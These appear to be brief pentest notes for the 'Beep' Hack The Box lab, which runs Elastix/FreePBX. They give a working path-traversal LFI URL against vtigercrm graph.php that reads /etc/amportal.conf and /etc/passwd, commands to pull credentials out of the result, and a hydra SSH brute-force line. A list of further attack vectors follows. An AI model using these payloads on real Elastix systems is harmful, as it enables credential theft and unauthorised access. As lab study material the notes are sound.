Elastix FreePBX
Elastix LFI graph.php
searchsploit elastix
searchsploit -m 37637 ..copy LFI
https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action
Ignore users with nologin
vim > :g/nologin/d
Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt
hydra -L users.txt -P pass.txt ssh://$IP
Passwords found here.. could be used as 'root' :)
(beep htb)Elastix LFI vtigercrm
PBX Extensions
Remote Code Execution
Email php injection
Metasploit
PBX Shellshock
Last updated